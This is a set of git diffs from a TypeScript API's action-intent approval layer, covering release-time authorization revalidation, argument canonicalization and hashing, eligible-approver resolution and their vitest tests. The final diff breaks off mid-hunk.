     // undefined (CRITICAL-2b).
     expect(permState.getUserPermissions).toHaveBeenCalledWith('user-1', { partnerId: undefined, orgId: 'org-1' });
+  });
+
+  it('returns null when a partner requester lost selected access to intent.orgId', async () => {
+    // The bug this guards: getUserPermissions resolves the PARTNER axis for a
+    // partner-scope requester (they have no organization_users row), returning
+    // a non-null perms object carrying orgAccess='selected' + allowedOrgIds
+    // that NO LONGER includes intent.orgId. A non-null perms alone must NOT
+    // authorize release — canAccessOrg re-applies the selected-org gate.
+    dbState.selectUsersResults.push([activeUser]);
+    permState.getUserPermissions.mockResolvedValueOnce({
+      permissions: [],
+      partnerId: 'partner-1',
+      orgId: 'org-1',
+      roleId: 'role-1',
+      scope: 'partner',
+      orgAccess: 'selected',
+      allowedOrgIds: ['org-99'], // org-1 was removed
+    });
+
+    const result = await buildAuthContextForIntent(baseIntent({ partnerId: 'partner-1' }));
+
+    expect(result).toBeNull();
+  });
+
+  it('builds a partner-scoped AuthContext when selected access still covers intent.orgId', async () => {
+    dbState.selectUsersResults.push([activeUser]);
+    permState.getUserPermissions.mockResolvedValueOnce({
+      permissions: [],
+      partnerId: 'partner-1',
+      orgId: 'org-1',
+      roleId: 'role-1',
+      scope: 'partner',
+      orgAccess: 'selected',
+      allowedOrgIds: ['org-1', 'org-99'],
+    });
+
+    const result = await buildAuthContextForIntent(baseIntent({ partnerId: 'partner-1' }));
+
+    expect(result).not.toBeNull();
+    expect(result!.accessibleOrgIds).toEqual(['org-1']);
   });
 
   it('builds an org-scoped AuthContext on the happy path', async () => {

--- a/apps/api/src/services/actionIntents/actorContext.ts
+++ b/apps/api/src/services/actionIntents/actorContext.ts
@@ -3,7 +3,7 @@ import { db, withSystemDbAccessContext } from '../../db';
 import { users } from '../../db/schema/users';
 import { apiKeys } from '../../db/schema/apiKeys';
 import type { ActionIntent } from '../../db/schema/actionIntents';
-import { getUserPermissions } from '../permissions';
+import { getUserPermissions, canAccessOrg as permsCanAccessOrg } from '../permissions';
 import { buildOrgAccessClosures, siteAccessCheck, type AuthContext } from '../../middleware/auth';
 import type { TokenPayload } from '../jwt';
 
@@ -64,25 +64,38 @@ async function buildUserOwnedAuthContext(
       return null;
     }
 
-    // The core revalidation: getUserPermissions returns null when the user
-    // has NO current membership row on this org (org axis) — i.e. they lost
-    // access to intent.orgId since the intent was created/approved. A
-    // shrunk permission set must fail release, never silently execute with
-    // the stale rights the intent was created under.
+    // The core revalidation: resolve the actor's CURRENT permission set for
+    // this org and fail closed if they can no longer reach intent.orgId.
     //
-    // partnerId is threaded through too (CRITICAL-2b): a partner-scope
-    // requester (the primary MSP persona) has no organization_users row at
-    // all — their role lives in partner_users — so passing only { orgId }
-    // resolves NO role and getUserPermissions returns null for every
-    // partner-scope requester, failing release closed even though the
-    // requester still legitimately has access. intent.partnerId is the
-    // denormalized value createActionIntent now persists from the
-    // requester's auth at creation time (see intentService.ts).
+    // partnerId is threaded through (CRITICAL-2b): a partner-scope requester
+    // (the primary MSP persona) has no organization_users row at all — their
+    // role lives in partner_users — so passing only { orgId } resolves NO role
+    // and getUserPermissions returns null for every partner-scope requester,
+    // failing release closed even though the requester still legitimately has
+    // access. intent.partnerId is the denormalized value createActionIntent
+    // persists from the requester's auth at creation time (see
+    // intentService.ts).
     const perms = await getUserPermissions(userId, {
       partnerId: intent.partnerId ?? undefined,
       orgId: intent.orgId,
     });
     if (!perms) {
+      return null;
+    }
+
+    // getUserPermissions returning non-null is NOT sufficient: for a
+    // partner-scope requester it resolves the PARTNER axis (partner_users),
+    // which carries org_access='selected' + an allowedOrgIds list but does
+    // NOT itself verify intent.orgId is still in that list. A partner tech
+    // whose selected-org list was narrowed to drop intent.orgId (while their
+    // partner membership + tool RBAC stay intact) would otherwise be handed a
+    // synthesized accessibleOrgIds:[intent.orgId] below and execute against an
+    // org they can no longer reach. canAccessOrg re-applies the exact
+    // all/none/selected org-access gate, so a narrowed actor fails release
+    // closed. (Org-axis actors trivially pass — canAccessOrg checks
+    // perms.orgId === intent.orgId, which resolveOrgAxis only returns on a
+    // live membership row.)
+    if (!permsCanAccessOrg(perms, intent.orgId)) {
       return null;
     }
 

--- a/apps/api/src/services/actionIntents/actorContext.ts
+++ b/apps/api/src/services/actionIntents/actorContext.ts
@@ -1,0 +1,162 @@
+import { eq } from 'drizzle-orm';
+import { db, withSystemDbAccessContext } from '../../db';
+import { users } from '../../db/schema/users';
+import { apiKeys } from '../../db/schema/apiKeys';
+import type { ActionIntent } from '../../db/schema/actionIntents';
+import { getUserPermissions } from '../permissions';
+import { buildOrgAccessClosures, siteAccessCheck, type AuthContext } from '../../middleware/auth';
+import type { TokenPayload } from '../jwt';
+
+/**
+ * Rebuilds the acting `AuthContext` for a stored action intent at RELEASE
+ * time (spec docs/superpowers/specs/2026-07-18-action-intents-approval-layer-design.md
+ * §5) — the release worker's trust boundary: a reconstructed identity is
+ * about to execute a real, privileged Tier-3 action, so this must fail
+ * CLOSED on any doubt. Returns `null` on ANY validation failure; the caller
+ * (`jobs/intentReleaseWorker.ts`) maps a `null` result to intent
+ * `failed: actor_invalid` and never falls back to a looser context.
+ *
+ * Reuses `buildOrgAccessClosures` + `siteAccessCheck` (middleware/auth.ts) —
+ * the SAME closure factories `authMiddleware` uses to build the request-path
+ * AuthContext — so org/site access semantics can never drift between "live
+ * request" and "durable release" execution.
+ */
+export async function buildAuthContextForIntent(intent: ActionIntent): Promise<AuthContext | null> {
+  if (intent.requestedByUserId) {
+    return buildUserOwnedAuthContext(intent, intent.requestedByUserId);
+  }
+
+  if (intent.requestingApiKeyId) {
+    return buildApiKeyOwnedAuthContext(intent, intent.requestingApiKeyId);
+  }
+
+  // The migration's action_intents_one_actor_chk CHECK guarantees exactly
+  // one of requestedByUserId/requestingApiKeyId is set — an intent with
+  // neither is a data-integrity violation, not a normal revalidation
+  // failure. Fail closed the same as any other actor_invalid case rather
+  // than throwing out of a background worker.
+  console.error(
+    `[actorContext] intent ${intent.id} has neither requestedByUserId nor requestingApiKeyId set`,
+  );
+  return null;
+}
+
+async function buildUserOwnedAuthContext(
+  intent: ActionIntent,
+  userId: string,
+): Promise<AuthContext | null> {
+  return withSystemDbAccessContext(async (): Promise<AuthContext | null> => {
+    const [user] = await db
+      .select({
+        id: users.id,
+        email: users.email,
+        name: users.name,
+        status: users.status,
+        isPlatformAdmin: users.isPlatformAdmin,
+      })
+      .from(users)
+      .where(eq(users.id, userId))
+      .limit(1);
+
+    // Not found, invited (never completed setup), or disabled — the account
+    // no longer stands behind the action it requested/approved.
+    if (!user || user.status !== 'active') {
+      return null;
+    }
+
+    // The core revalidation: getUserPermissions returns null when the user
+    // has NO current membership row on this org (org axis) — i.e. they lost
+    // access to intent.orgId since the intent was created/approved. A
+    // shrunk permission set must fail release, never silently execute with
+    // the stale rights the intent was created under.
+    const perms = await getUserPermissions(userId, { orgId: intent.orgId });
+    if (!perms) {
+      return null;
+    }
+
+    const { orgCondition, canAccessOrg } = buildOrgAccessClosures([intent.orgId]);
+    const allowedSiteIds = perms.allowedSiteIds;
+
+    // Synthesized, not re-verified downstream: executeTool's device/org
+    // gates key off the closures + accessibleOrgIds below, not off `token`
+    // contents (see the module doc). `roleId` is still populated from the
+    // freshly-resolved perms (not null) so that IF any future code path
+    // re-checks `auth.token.roleId` — aiGuardrails.checkToolPermission /
+    // checkPermissionRequirements treat `roleId === null` as a fail-OPEN
+    // helper-session bypass — a reconstructed release-worker context can
+    // never accidentally inherit that bypass.
+    const token: TokenPayload = {
+      sub: userId,
+      email: user.email,
+      roleId: perms.roleId,
+      orgId: intent.orgId,
+      partnerId: intent.partnerId ?? null,
+      scope: 'organization',
+      type: 'access',
+      mfa: true,
+    };
+
+    return {
+      user: {
+        id: user.id,
+        email: user.email,
+        name: user.name,
+        isPlatformAdmin: user.isPlatformAdmin,
+      },
+      token,
+      // action_intents.partner_id is a denormalized, ops-only field (Shape 1
+      // / org axis — see db/schema/actionIntents.ts's header comment), not
+      // an authorization axis, and may be null. It is carried onto the
+      // AuthContext for parity with a live org-scope token but never gates
+      // anything here — org access is entirely via accessibleOrgIds /
+      // orgCondition below.
+      partnerId: intent.partnerId ?? null,
+      orgId: intent.orgId,
+      scope: 'organization',
+      accessibleOrgIds: [intent.orgId],
+      orgCondition,
+      canAccessOrg,
+      allowedSiteIds,
+      canAccessSite: siteAccessCheck(allowedSiteIds),
+    };
+  });
+}
+
+/**
+ * API-key-owned intents (`requesting_api_key_id` set, `source: 'mcp_api'`).
+ * DEFENSIVE branch only. In the current Plan 1 delivery,
+ * `createActionIntent` (services/actionIntents/intentService.ts) always
+ * attributes an intent to `auth.user.id` — every caller reaching it today
+ * (the chat SDK) authenticates as a user — so `requesting_api_key_id` is
+ * never actually set on a stored intent yet. The `mcp_api` MCP `tools/call`
+ * → intent wiring that WOULD populate this field ships in Plan 2 (the MCP
+ * cutover, spec §6.2), which also has to decide how an api-key-owned
+ * intent's scopes/site restrictions get carried onto the released
+ * AuthContext — mirroring middleware/apiKeyAuth.ts's apiKeyAuthMiddleware /
+ * the `buildAuthFromApiKey` reconstruction in routes/mcpServer.ts. Rather
+ * than fork a partial, untested copy of that (non-exported, ~90-line)
+ * logic now, this checks the key is still live and then fails closed with a
+ * clear signal — Plan 2 replaces this branch with the full rebuild.
+ */
+async function buildApiKeyOwnedAuthContext(
+  intent: ActionIntent,
+  apiKeyId: string,
+): Promise<AuthContext | null> {
+  return withSystemDbAccessContext(async (): Promise<AuthContext | null> => {
+    const [key] = await db
+      .select({ id: apiKeys.id, status: apiKeys.status })
+      .from(apiKeys)
+      .where(eq(apiKeys.id, apiKeyId))
+      .limit(1);
+
+    if (!key || key.status !== 'active') {
+      return null;
+    }
+
+    console.error(
+      `[actorContext] intent ${intent.id} is api-key-owned (key ${apiKeyId}) — full context `
+      + 'rebuild is not implemented until Plan 2 (MCP cutover); failing closed to actor_invalid',
+    );
+    return null;
+  });
+}

--- a/apps/api/src/services/actionIntents/actorContext.ts
+++ b/apps/api/src/services/actionIntents/actorContext.ts
@@ -69,7 +69,19 @@ async function buildUserOwnedAuthContext(
     // access to intent.orgId since the intent was created/approved. A
     // shrunk permission set must fail release, never silently execute with
     // the stale rights the intent was created under.
-    const perms = await getUserPermissions(userId, { orgId: intent.orgId });
+    //
+    // partnerId is threaded through too (CRITICAL-2b): a partner-scope
+    // requester (the primary MSP persona) has no organization_users row at
+    // all — their role lives in partner_users — so passing only { orgId }
+    // resolves NO role and getUserPermissions returns null for every
+    // partner-scope requester, failing release closed even though the
+    // requester still legitimately has access. intent.partnerId is the
+    // denormalized value createActionIntent now persists from the
+    // requester's auth at creation time (see intentService.ts).
+    const perms = await getUserPermissions(userId, {
+      partnerId: intent.partnerId ?? undefined,
+      orgId: intent.orgId,
+    });
     if (!perms) {
       return null;
     }

--- a/apps/api/src/services/actionIntents/canonicalize.test.ts
+++ b/apps/api/src/services/actionIntents/canonicalize.test.ts
@@ -1,0 +1,165 @@
+import { describe, it, expect } from 'vitest';
+import { canonicalizeArguments, computeArgumentDigest } from './canonicalize';
+
+describe('canonicalizeArguments', () => {
+  it('should have identical output for different key orders', () => {
+    const obj1 = { b: 1, a: 2 };
+    const obj2 = { a: 2, b: 1 };
+    expect(canonicalizeArguments(obj1)).toBe(canonicalizeArguments(obj2));
+  });
+
+  it('should sort nested object keys', () => {
+    const obj = { z: { b: 1, a: 2 }, a: 3 };
+    const canonical = canonicalizeArguments(obj);
+    const parsed = JSON.parse(canonical);
+    const keys = Object.keys(parsed);
+    expect(keys).toEqual(['a', 'z']);
+    expect(Object.keys(parsed.z)).toEqual(['a', 'b']);
+  });
+
+  it('should preserve array order', () => {
+    const obj1 = { arr: [1, 2, 3] };
+    const obj2 = { arr: [3, 2, 1] };
+    expect(canonicalizeArguments(obj1)).not.toBe(canonicalizeArguments(obj2));
+  });
+
+  it('should drop undefined properties', () => {
+    const obj1 = { a: 1, b: undefined, c: 2 };
+    const obj2 = { a: 1, c: 2 };
+    expect(canonicalizeArguments(obj1)).toBe(canonicalizeArguments(obj2));
+  });
+
+  it('should drop undefined in arrays as nulls', () => {
+    const obj1 = { arr: [1, undefined, 3] };
+    const canonical = canonicalizeArguments(obj1);
+    const parsed = JSON.parse(canonical);
+    expect(parsed.arr).toEqual([1, null, 3]);
+  });
+
+  it('should throw on circular references', () => {
+    const obj: Record<string, unknown> = { a: 1 };
+    obj.self = obj;
+    expect(() => canonicalizeArguments(obj)).toThrow(TypeError);
+    expect(() => canonicalizeArguments(obj)).toThrow('circular argument structure');
+  });
+
+  it('should throw on functions', () => {
+    const obj = { fn: () => {} };
+    expect(() => canonicalizeArguments(obj as Record<string, unknown>)).toThrow(TypeError);
+    expect(() => canonicalizeArguments(obj as Record<string, unknown>)).toThrow(
+      'argument value is not JSON-serializable'
+    );
+  });
+
+  it('should throw on symbols', () => {
+    const obj = { sym: Symbol('test') };
+    expect(() => canonicalizeArguments(obj as Record<string, unknown>)).toThrow(TypeError);
+    expect(() => canonicalizeArguments(obj as Record<string, unknown>)).toThrow(
+      'argument value is not JSON-serializable'
+    );
+  });
+
+  it('should throw on bigints', () => {
+    const obj = { big: BigInt(123) };
+    expect(() => canonicalizeArguments(obj as Record<string, unknown>)).toThrow(TypeError);
+    expect(() => canonicalizeArguments(obj as Record<string, unknown>)).toThrow(
+      'argument value is not JSON-serializable'
+    );
+  });
+
+  it('should handle null and primitive values', () => {
+    const obj = { null: null, str: 'test', num: 42, bool: true };
+    const canonical = canonicalizeArguments(obj);
+    const parsed = JSON.parse(canonical);
+    expect(parsed).toEqual({ bool: true, null: null, num: 42, str: 'test' });
+  });
+
+  it('should handle nested arrays with objects', () => {
+    const obj = { arr: [{ z: 1, a: 2 }, { b: 3, a: 4 }] };
+    const canonical = canonicalizeArguments(obj);
+    const parsed = JSON.parse(canonical);
+    expect(Object.keys(parsed.arr[0])).toEqual(['a', 'z']);
+    expect(Object.keys(parsed.arr[1])).toEqual(['a', 'b']);
+  });
+});
+
+describe('computeArgumentDigest', () => {
+  it('should return 64-character lowercase hex string', () => {
+    const digest = computeArgumentDigest('test');
+    expect(digest).toMatch(/^[0-9a-f]{64}$/);
+  });
+
+  it('should produce consistent digest for same input', () => {
+    const canonical = canonicalizeArguments({ a: 1, b: 2 });
+    const digest1 = computeArgumentDigest(canonical);
+    const digest2 = computeArgumentDigest(canonical);
+    expect(digest1).toBe(digest2);
+  });
+
+  it('should produce different digests for different inputs', () => {
+    const canonical1 = canonicalizeArguments({ a: 1 });
+    const canonical2 = canonicalizeArguments({ a: 2 });
+    const digest1 = computeArgumentDigest(canonical1);
+    const digest2 = computeArgumentDigest(canonical2);
+    expect(digest1).not.toBe(digest2);
+  });
+
+  it('should produce same digest for canonically equivalent inputs', () => {
+    const obj1 = { b: 1, a: 2 };
+    const obj2 = { a: 2, b: 1 };
+    const canonical1 = canonicalizeArguments(obj1);
+    const canonical2 = canonicalizeArguments(obj2);
+    const digest1 = computeArgumentDigest(canonical1);
+    const digest2 = computeArgumentDigest(canonical2);
+    expect(digest1).toBe(digest2);
+  });
+
+  it('should handle empty canonical string', () => {
+    const digest = computeArgumentDigest('');
+    expect(digest).toMatch(/^[0-9a-f]{64}$/);
+  });
+
+  it('should produce different digests for different array orders', () => {
+    const canonical1 = canonicalizeArguments({ arr: [1, 2, 3] });
+    const canonical2 = canonicalizeArguments({ arr: [3, 2, 1] });
+    const digest1 = computeArgumentDigest(canonical1);
+    const digest2 = computeArgumentDigest(canonical2);
+    expect(digest1).not.toBe(digest2);
+  });
+});
+
+describe('integration: canonicalize + digest round-trip', () => {
+  it('should produce stable digests across multiple canonicalizations', () => {
+    const obj = {
+      userId: '123',
+      action: 'deploy',
+      params: {
+        timeout: 5000,
+        retry: true,
+        targets: ['server-1', 'server-2'],
+      },
+    };
+
+    const digest1 = computeArgumentDigest(canonicalizeArguments(obj));
+    const digest2 = computeArgumentDigest(canonicalizeArguments(obj));
+    expect(digest1).toBe(digest2);
+  });
+
+  it('should produce same digest regardless of input key order', () => {
+    const obj1 = {
+      userId: '123',
+      action: 'deploy',
+      params: { timeout: 5000, retry: true },
+    };
+
+    const obj2 = {
+      params: { retry: true, timeout: 5000 },
+      action: 'deploy',
+      userId: '123',
+    };
+
+    const digest1 = computeArgumentDigest(canonicalizeArguments(obj1));
+    const digest2 = computeArgumentDigest(canonicalizeArguments(obj2));
+    expect(digest1).toBe(digest2);
+  });
+});

--- a/apps/api/src/services/actionIntents/canonicalize.test.ts
+++ b/apps/api/src/services/actionIntents/canonicalize.test.ts
@@ -43,6 +43,38 @@ describe('canonicalizeArguments', () => {
     expect(() => canonicalizeArguments(obj)).toThrow('circular argument structure');
   });
 
+  it('should allow a shared (non-circular) object instance reused at sibling keys', () => {
+    const shared = { m: 1, n: 2 };
+    const obj = { x: shared, y: shared };
+    const canonical = canonicalizeArguments(obj);
+    const parsed = JSON.parse(canonical);
+    expect(parsed.x).toEqual({ m: 1, n: 2 });
+    expect(parsed.y).toEqual({ m: 1, n: 2 });
+    expect(canonicalizeArguments({ x: shared })).toBe(
+      JSON.stringify({ x: { m: 1, n: 2 } })
+    );
+  });
+
+  it('should allow a shared (non-circular) object instance reused within an array', () => {
+    const shared = { a: 1 };
+    const obj = { arr: [shared, shared] };
+    const canonical = canonicalizeArguments(obj);
+    const parsed = JSON.parse(canonical);
+    expect(parsed.arr).toEqual([{ a: 1 }, { a: 1 }]);
+  });
+
+  it('should allow a deep shared reference reused across sibling subtrees', () => {
+    const sharedLeaf = { id: 'leaf', value: 42 };
+    const obj = {
+      branchA: { nested: { leaf: sharedLeaf } },
+      branchB: { otherNested: { leaf: sharedLeaf } },
+    };
+    expect(() => canonicalizeArguments(obj)).not.toThrow();
+    const parsed = JSON.parse(canonicalizeArguments(obj));
+    expect(parsed.branchA.nested.leaf).toEqual({ id: 'leaf', value: 42 });
+    expect(parsed.branchB.otherNested.leaf).toEqual({ id: 'leaf', value: 42 });
+  });
+
   it('should throw on functions', () => {
     const obj = { fn: () => {} };
     expect(() => canonicalizeArguments(obj as Record<string, unknown>)).toThrow(TypeError);

--- a/apps/api/src/services/actionIntents/canonicalize.ts
+++ b/apps/api/src/services/actionIntents/canonicalize.ts
@@ -1,0 +1,27 @@
+import { createHash } from 'crypto';
+
+function sortValue(value: unknown, seen: WeakSet<object>): unknown {
+  if (value === null || typeof value !== 'object') {
+    if (typeof value === 'function' || typeof value === 'symbol' || typeof value === 'bigint') {
+      throw new TypeError('argument value is not JSON-serializable');
+    }
+    return value;
+  }
+  if (seen.has(value as object)) throw new TypeError('circular argument structure');
+  seen.add(value as object);
+  if (Array.isArray(value)) return value.map((item) => sortValue(item, seen));
+  const out: Record<string, unknown> = {};
+  for (const key of Object.keys(value as Record<string, unknown>).sort()) {
+    const item = (value as Record<string, unknown>)[key];
+    if (item !== undefined) out[key] = sortValue(item, seen);
+  }
+  return out;
+}
+
+export function canonicalizeArguments(input: Record<string, unknown>): string {
+  return JSON.stringify(sortValue(input, new WeakSet()));
+}
+
+export function computeArgumentDigest(canonical: string): string {
+  return createHash('sha256').update(canonical, 'utf8').digest('hex');
+}

--- a/apps/api/src/services/actionIntents/canonicalize.ts
+++ b/apps/api/src/services/actionIntents/canonicalize.ts
@@ -9,13 +9,17 @@ function sortValue(value: unknown, seen: WeakSet<object>): unknown {
   }
   if (seen.has(value as object)) throw new TypeError('circular argument structure');
   seen.add(value as object);
-  if (Array.isArray(value)) return value.map((item) => sortValue(item, seen));
-  const out: Record<string, unknown> = {};
-  for (const key of Object.keys(value as Record<string, unknown>).sort()) {
-    const item = (value as Record<string, unknown>)[key];
-    if (item !== undefined) out[key] = sortValue(item, seen);
+  try {
+    if (Array.isArray(value)) return value.map((item) => sortValue(item, seen));
+    const out: Record<string, unknown> = {};
+    for (const key of Object.keys(value as Record<string, unknown>).sort()) {
+      const item = (value as Record<string, unknown>)[key];
+      if (item !== undefined) out[key] = sortValue(item, seen);
+    }
+    return out;
+  } finally {
+    seen.delete(value as object);
   }
-  return out;
 }
 
 export function canonicalizeArguments(input: Record<string, unknown>): string {

--- a/apps/api/src/services/actionIntents/intentApprovers.test.ts
+++ b/apps/api/src/services/actionIntents/intentApprovers.test.ts
@@ -1,0 +1,144 @@
+import { beforeEach, describe, expect, it, vi } from 'vitest';
+
+vi.mock('../../db', () => ({
+  withSystemDbAccessContext: vi.fn(async (fn: () => Promise<unknown>) => fn()),
+  db: {
+    select: vi.fn(),
+  },
+}));
+
+vi.mock('../../db/schema', () => ({
+  organizations: { id: 'id', partnerId: 'partner_id' },
+  organizationUsers: { userId: 'user_id', orgId: 'org_id', roleId: 'role_id' },
+  partnerUsers: { userId: 'user_id', partnerId: 'partner_id', roleId: 'role_id', orgAccess: 'org_access', orgIds: 'org_ids' },
+  rolePermissions: { roleId: 'role_id', permissionId: 'permission_id' },
+  permissions: { id: 'id', resource: 'resource', action: 'action' },
+}));
+
+import { db } from '../../db';
+import { resolveIntentApprovers } from './intentApprovers';
+
+/**
+ * The resolver issues these selects in order:
+ *   1. granting roles:  select().from(rolePermissions).innerJoin(permissions).where()
+ *   2. org partner:     select().from(organizations).where().limit()
+ *   3. org members:     select().from(organizationUsers).where()
+ *   4. partner members: select().from(partnerUsers).where()
+ * (4 is skipped when the org has no partner.)
+ */
+function queueSelects(opts: {
+  grantingRoles: Array<{ roleId: string }>;
+  org: Array<{ partnerId: string | null }>;
+  orgMembers: Array<{ userId: string }>;
+  partnerMembers: Array<{ userId: string; orgAccess: string; orgIds: string[] | null }>;
+}) {
+  const joinWhere = vi.fn().mockResolvedValue(opts.grantingRoles);
+  vi.mocked(db.select).mockReturnValueOnce({
+    from: vi.fn().mockReturnValue({
+      innerJoin: vi.fn().mockReturnValue({ where: joinWhere }),
+    }),
+  } as any);
+
+  vi.mocked(db.select).mockReturnValueOnce({
+    from: vi.fn().mockReturnValue({
+      where: vi.fn().mockReturnValue({ limit: vi.fn().mockResolvedValue(opts.org) }),
+    }),
+  } as any);
+
+  vi.mocked(db.select).mockReturnValueOnce({
+    from: vi.fn().mockReturnValue({
+      where: vi.fn().mockResolvedValue(opts.orgMembers),
+    }),
+  } as any);
+
+  vi.mocked(db.select).mockReturnValueOnce({
+    from: vi.fn().mockReturnValue({
+      where: vi.fn().mockResolvedValue(opts.partnerMembers),
+    }),
+  } as any);
+}
+
+describe('resolveIntentApprovers', () => {
+  beforeEach(() => {
+    vi.clearAllMocks();
+    vi.mocked(db.select).mockReset();
+  });
+
+  it('returns distinct userIds across org members AND partner members with org_access covering the org', async () => {
+    queueSelects({
+      grantingRoles: [{ roleId: 'role-decide' }, { roleId: 'role-decide' }],
+      org: [{ partnerId: 'partner-1' }],
+      orgMembers: [{ userId: 'u-org' }],
+      partnerMembers: [
+        { userId: 'u-all', orgAccess: 'all', orgIds: null },
+        { userId: 'u-sel-yes', orgAccess: 'selected', orgIds: ['org-1', 'org-9'] },
+        { userId: 'u-sel-no', orgAccess: 'selected', orgIds: ['org-other'] },
+        { userId: 'u-none', orgAccess: 'none', orgIds: null },
+      ],
+    });
+
+    const result = await resolveIntentApprovers('org-1');
+    expect([...result].sort()).toEqual(['u-all', 'u-org', 'u-sel-yes']);
+  });
+
+  it('includes a role whose only grant is a wildcard (resource=* or action=*)', async () => {
+    queueSelects({
+      grantingRoles: [{ roleId: 'role-superadmin' }],
+      org: [{ partnerId: 'partner-1' }],
+      orgMembers: [{ userId: 'u-admin' }],
+      partnerMembers: [],
+    });
+
+    const result = await resolveIntentApprovers('org-1');
+    expect(result).toEqual(['u-admin']);
+  });
+
+  it('returns [] when no role grants approvals:decide', async () => {
+    queueSelects({
+      grantingRoles: [],
+      org: [{ partnerId: 'partner-1' }],
+      orgMembers: [],
+      partnerMembers: [],
+    });
+
+    const result = await resolveIntentApprovers('org-1');
+    expect(result).toEqual([]);
+    // Short-circuits before any membership lookup.
+    expect(db.select).toHaveBeenCalledTimes(1);
+  });
+
+  it('skips the partner-members lookup when the org has no partner', async () => {
+    const joinWhere = vi.fn().mockResolvedValue([{ roleId: 'role-decide' }]);
+    vi.mocked(db.select).mockReturnValueOnce({
+      from: vi.fn().mockReturnValue({
+        innerJoin: vi.fn().mockReturnValue({ where: joinWhere }),
+      }),
+    } as any);
+    vi.mocked(db.select).mockReturnValueOnce({
+      from: vi.fn().mockReturnValue({
+        where: vi.fn().mockReturnValue({ limit: vi.fn().mockResolvedValue([{ partnerId: null }]) }),
+      }),
+    } as any);
+    vi.mocked(db.select).mockReturnValueOnce({
+      from: vi.fn().mockReturnValue({
+        where: vi.fn().mockResolvedValue([{ userId: 'u-org' }]),
+      }),
+    } as any);
+
+    const result = await resolveIntentApprovers('org-1');
+    expect(result).toEqual(['u-org']);
+    expect(db.select).toHaveBeenCalledTimes(3);
+  });
+
+  it('returns [] when eligible members exist but none carry a granting role', async () => {
+    queueSelects({
+      grantingRoles: [{ roleId: 'role-decide' }],
+      org: [{ partnerId: 'partner-1' }],
+      orgMembers: [],
+      partnerMembers: [],
+    });
+
+    const result = await resolveIntentApprovers('org-1');
+    expect(result).toEqual([]);
+  });
+});

--- a/apps/api/src/services/actionIntents/intentApprovers.ts
+++ b/apps/api/src/services/actionIntents/intentApprovers.ts
@@ -1,0 +1,117 @@
+/**
+ * Action intents & durable approval layer — eligible-approver resolution
+ * (spec docs/superpowers/specs/2026-07-18-action-intents-approval-layer-design.md
+ * §4; CRITICAL-2 fix).
+ *
+ * Given an org, returns the distinct set of user ids eligible to decide a
+ * Tier-3 action intent: a user is eligible iff their role in (or covering)
+ * the org grants `approvals:decide`.
+ *
+ * Mirrors `resolveElevationApprovers` (services/pamApprovers.ts) EXACTLY for
+ * the role/membership resolution — role-ids granting the permission (incl.
+ * wildcard '*' grants) via role_permissions ⋈ permissions, then
+ * organization_users direct members + partner_users of the org's owning
+ * partner with org_access 'all' or 'selected' ∋ orgId — but gates on
+ * `PERMISSIONS.APPROVALS_DECIDE` instead of `DEVICES_EXECUTE`, and WITHOUT
+ * the mobile-device narrowing: an action-intent approver decides from the web
+ * app or an MCP client, not necessarily a phone, so `resolveElevationApprovers`'s
+ * final `mobile_devices` filter has no equivalent here.
+ *
+ * Runs under a system DB access context: this reads role_permissions,
+ * permissions, organization_users, partner_users, and organizations — RLS-
+ * scoped tables the caller's org-scoped request context (createActionIntent
+ * runs inside the REQUESTER's org context, not a privileged one) cannot fully
+ * see. Most importantly `partner_users` (Shape 3, partner-axis RLS), which a
+ * pure org-scope caller can never read — exactly the population CRITICAL-2
+ * exists to surface (partner-scope MSP techs/admins have no
+ * `organization_users` row at all).
+ */
+
+import { eq, and, inArray } from 'drizzle-orm';
+import { db, withSystemDbAccessContext } from '../../db';
+import {
+  organizations,
+  organizationUsers,
+  partnerUsers,
+  rolePermissions,
+  permissions,
+} from '../../db/schema';
+import { PERMISSIONS } from '../permissions';
+
+/**
+ * Resolve the distinct user ids eligible to decide an action intent for
+ * `orgId`. Empty array when none qualify. Pure-read; opens its own system DB
+ * context, so it may be called from any ambient context (or none).
+ */
+export async function resolveIntentApprovers(orgId: string): Promise<string[]> {
+  return withSystemDbAccessContext(async () => {
+    // Role ids that grant approvals:decide. One join from role_permissions →
+    // permissions; matches the resource/action pair AND the wildcard grants
+    // (resource='*' / action='*') so this resolver mirrors hasPermission()
+    // (permissions.ts), which treats resource==='*' / action==='*' as
+    // covering any concrete pair. Without this a role granting approvals:* or
+    // *:* (superadmin) would never resolve as an eligible approver.
+    const grantingRoles = await db
+      .select({ roleId: rolePermissions.roleId })
+      .from(rolePermissions)
+      .innerJoin(permissions, eq(rolePermissions.permissionId, permissions.id))
+      .where(
+        and(
+          inArray(permissions.resource, [PERMISSIONS.APPROVALS_DECIDE.resource, '*']),
+          inArray(permissions.action, [PERMISSIONS.APPROVALS_DECIDE.action, '*']),
+        ),
+      );
+
+    const grantingRoleIds = [...new Set(grantingRoles.map((r) => r.roleId))];
+    if (grantingRoleIds.length === 0) return [];
+
+    // The org's owning partner — needed to resolve partner-scope membership.
+    const [org] = await db
+      .select({ partnerId: organizations.partnerId })
+      .from(organizations)
+      .where(eq(organizations.id, orgId))
+      .limit(1);
+
+    const candidateUserIds = new Set<string>();
+
+    // 1. Direct org members holding an approvals:decide role.
+    const orgMembers = await db
+      .select({ userId: organizationUsers.userId })
+      .from(organizationUsers)
+      .where(
+        and(
+          eq(organizationUsers.orgId, orgId),
+          inArray(organizationUsers.roleId, grantingRoleIds),
+        ),
+      );
+    for (const m of orgMembers) candidateUserIds.add(m.userId);
+
+    // 2. Partner members of the org's partner whose org_access covers this
+    // org — the population plain organization_users membership can never see
+    // (CRITICAL-2: partner techs/admins have no organization_users row).
+    if (org?.partnerId) {
+      const partnerMembers = await db
+        .select({
+          userId: partnerUsers.userId,
+          orgAccess: partnerUsers.orgAccess,
+          orgIds: partnerUsers.orgIds,
+        })
+        .from(partnerUsers)
+        .where(
+          and(
+            eq(partnerUsers.partnerId, org.partnerId),
+            inArray(partnerUsers.roleId, grantingRoleIds),
+          ),
+        );
+      for (const m of partnerMembers) {
+        if (m.orgAccess === 'all') {
+          candidateUserIds.add(m.userId);
+        } else if (m.orgAccess === 'selected' && m.orgIds?.includes(orgId)) {
+          candidateUserIds.add(m.userId);
+        }
+      }
+    }
+
+    return [...candidateUserIds];
+  });
+}

--- a/apps/api/src/services/actionIntents/intentService.test.ts
+++ b/apps/api/src/services/actionIntents/intentService.test.ts
@@ -183,6 +183,7 @@ import {
   ActionIntentAuthorizationError,
   type CreateActionIntentInput,
 } from './intentService';
+import { db, withDbAccessContext } from '../../db';
 
 // ---------------------------------------------------------------------------
 // Test fixtures
@@ -436,6 +437,55 @@ describe('createActionIntent — approver fan-out', () => {
